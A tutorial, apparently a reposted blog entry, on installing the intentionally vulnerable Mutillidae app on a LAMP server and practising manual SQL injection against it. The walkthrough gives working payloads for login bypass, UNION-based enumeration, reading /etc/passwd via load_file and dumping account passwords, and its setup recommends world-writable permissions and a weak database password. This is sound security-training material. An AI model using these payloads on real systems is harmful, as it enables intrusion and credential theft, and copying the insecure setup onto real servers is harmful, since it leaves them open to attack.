• Mutillidae setup


    SETTINGUPMUTILLIDAEINUBUNTU,BACKTRACK,BACKBOX,ETC.+MANUALSQLINJECTION

    Mutillidae

    Mutillidae is a free and open source web application for website penetration testing and hacking which was developed by Adrian “Irongeek” Crenshaw and Jeremy “webpwnized” Druin. It is designed to be exploitable and vulnerable and ideal for practicing your Web Fu skills like SQL injection, cross site scripting, HTML injection, Javascript injection, clickjacking, local file inclusion, authentication bypass methods, remote code execution and many more based on OWASP (Open Web Application Security) Top 10 Web Vulnerabilties:

    A1-Injection

    A2-Cross Site Scripting (XSS)

    A3-Broken Authentication and Session Management

    A4-Insecure Direct Object References

    A5-Cross Site Request Forgery (CSRF)

    A6-Security Misconfiguration

    A7-Insecure Cryptographic Storage

    A8-Failure to Restrict URL Access

    A9-Insufficient Transport Layer Protection

    A10-Unvalidated Redirects and Forwards

    – ** –

    Before we can install Mutillidae, we need to configure our LAMP (Linux Apache Mysql PHP, Python or Perl) server first. First we need to install Apache, type this in your terminal:

    LAMP server

    sudo apt-get install apache2

    Then install PHP:

    sudo apt-get install php5 libapache2-mod-php5

    Install the MYSQL server:

    sudo apt-get install mysql-server

    After that it should prompt you to setup the password for your Mysql server. In my case, I put ‘mysqlroot’ as my password just for demo purposes really although it’s not really advisable to use a weak password in a live server.

    Now setup your phpmyadmin (Optional):

    sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin

    Change the permission of your /var/www folder to make sure you will have all the rights to read, write and execute files by typing this command in your terminal:

    sudo chmod -R 0777 /var/www

    To check if the installation is successful navigate through this link in your browser: http://localhost/ orhttp://127.0.0.1/

    If you see something that says ‘It Works!’ then you are done setting up your LAMP server. Now time to install Mutillidae! Download and extract Mutillidae in the /var/www directory:

    sudo -s

    cd /var/www

    wget http://www.irongeek.com/mutillidae/mutillidae1.5.zip

    unzip mutillidae1.5.zip

    Next up we need to configure the config.inc which contains the dbhost, dbuser, dppass, and dbname configurations:

    cd mutillidae

    gedit config.inc

    By default the value $dbpass is left blank so we need to put the root password for Mysql which you entered during the installation of mysql-server. In my case I put mysqlroot.

    PHP configuration

    Make sure you have already started the services for Mysql and Apache but if not you can just type these commands in the terminal:

    service mysql start

    service apache2 start

    Then open your web browser again and point it to 127.0.0.1/mutillidae/ or localhost/mutillidae/. Next, let’s have the web application setup the database automatically by clicking Core Controls > Setup/Reset the DB at the left side or Setup/Reset the DB at the upperight corner.

    db setup

    The link  should take you to 127.0.0.1/mutillidae/set-up-database.php.

    databaseconfig

    If you see no errors then you are ready to play with Mutillidae. =)

    xss

    MANUALSQLINJECTION

    Now time for some action! \m/

    For me, the best way to understand and learn SQL (Structured Query Language) Injection if you are into web application penetration testing is to learn it manually rather than using automated tools and set up an open source web application that is vulnerable. Although I don’t discourage using tools for automation since tools can also be of great help. My only point is that, we should at least get familiar with the use of SQL statements for attacking a web application.

    To tell you honestly, I learned manual SQL Injection with the help of a mentor without any knowledge about SQL and PHP; and when I already had a formal class at college about SQL, Database Management, and PHP I was able to apply it and enjoyed it. So thank you mentor.. (You know who you are)

    Simple Bypass Authentication

    This is one of the pages where you can practice SQL Injection. Yeah, a login form:

    login form injection

    Let’s try to insert  (single quote) to check if we can to cause errors to see how the web application reacts.

    sql_error

    As what we can see from the image above, the actual SQL Query is SELECT * FROM accounts WHERE username=” AND password=”, if that is the case then we can attack this application using a simple bypass authentication method like inserting ‘ or ’1′ = ’1 on the password field which then forces the login form a selection of a valid password because the evaluation of ’1′=’1′ is always true. The query pulls out all the columns of the accounts table because it says SELECT * FROM accounts.

    passwords

    Finding the number of columns

    To find the number of columns we use the ORDER BY syntax and increment the number by 1 until the site returns to error. We use a comment character at the end or you may use the comment sequence: - -. We insert this on the login form (you can choose username/password filed):

    ‘ order by 1 #

    ‘ order by 2 #

    ‘ order by 3 #

    ‘ order by 4 #

    And because the query ‘ order by 5 # returns an error therefore there are four columns in the table, it gives an error on the 5th column because it does not exist on the records.

    unknown_column

    Union Select 101

    And now, we can use the UNION Select Statement for information gathering and recon attacks.

    ‘ union select 1,2,3,4 #

    union+select

    From the image above, you can tell that the page looked a bit messed up and that three numbers on the page appeared. These numbers are the column numbers we can get information from. We will replace them with statements later on. In fact you can just replace the values of the three numbers that are identical to the numbers you inputted on the union select. Take for example these:

    ‘ union select 1,2,’shipcode was here’,4 #

    mysqlinjection

    Finding the MySQL version

    To determine the Mysql version use @@version / version() on the desired number of column where you can get information. For example I choose three then the statement should be:

    ‘ union select 1,2,@@version,4 #

    mysqlversion

    Finding out the location of database directory

    We use @@datadir instead of @@version:

    ‘ union select 1,2,@@datadir,4 #

    Result:

    Username=/var/lib/mysql/
    Password=3
    Signature=4

    Finding out the current database user

    ‘ union select 1,system_user(),3,4 #

    or

    ‘union select 1,user(),3,4 #

    Result:

    Username=root@localhost
    Password=3
    Signature=4

    Using Load_File for directory traversal

    MySQL LOAD_FILE() reads the file and returns the file contents as a string.

    ‘ union select 1,load_file(‘/etc/passwd’),3,4 #

    This allows the attacker to gather some info about the directories and if he/she gets to see the /etc/shadow file then it’s possible for the attacker the crack the encrypted passwords.

    directory_traversal

    Finding the table_names

    Usually if the MySQL version is < 5 (4.x.x, 3.x.x, etc), column and table names can actually be guessed and the most common table names include: user/s, admin/s, member/s. But if you really wanna find the table name then you need to inject the website to find the table names. You can insert this syntax:

    ‘ union select 1,2,concat(table_name),4 from information_schema.tables where table_schema=database() #

    table_name

    The query above will show only the tables for the database of this web application which is owasp10 because of the WHERE clause : where table_schema=database(). But if you don’t use the where clause, it will also show other tables of the databases in the system.

    Finding the columns

    So it’s obvious that we need to get the information from the accounts table_name. So what’s next is to find the all columns of the database. It’s just like getting the table_names because you just change table_name to column_name and information_schema.tables to information_schema.columns, the statement should be:

    ‘ union select 1,2,concat(column_name),4 from information_schema.columns where table_schema=database() #

    column_name1

    Pawning the username and passwords in the database of the web application

    Now that we have the table names, and column names we can put them together and get some information from them.We need to use the union method to find the columns username and password from the table account. Thus, the statement below allows an attacker to dump the username and password of admin:

    ‘ union select 1,username,password,4 from accounts #

    dumpsql1

    Now we got the usernames and passwords =)

  • 相关阅读:
    阿里云服务器购买后的配置指南
    第一阶段总结
    RDD的checkpoint机制和键值对RDD数据分区
    广播变量与累加器
    Spark的监控
    Spark和MR的区别
    hadoop离线项目处理流程
    Flume(一)
    Sparkcore高级应用3
    SparkCore高级应用2(Spark on yarn)
  • 原文地址:https://www.cnblogs.com/vigarbuaa/p/3015041.html
Copyright © 2020-2023  润新知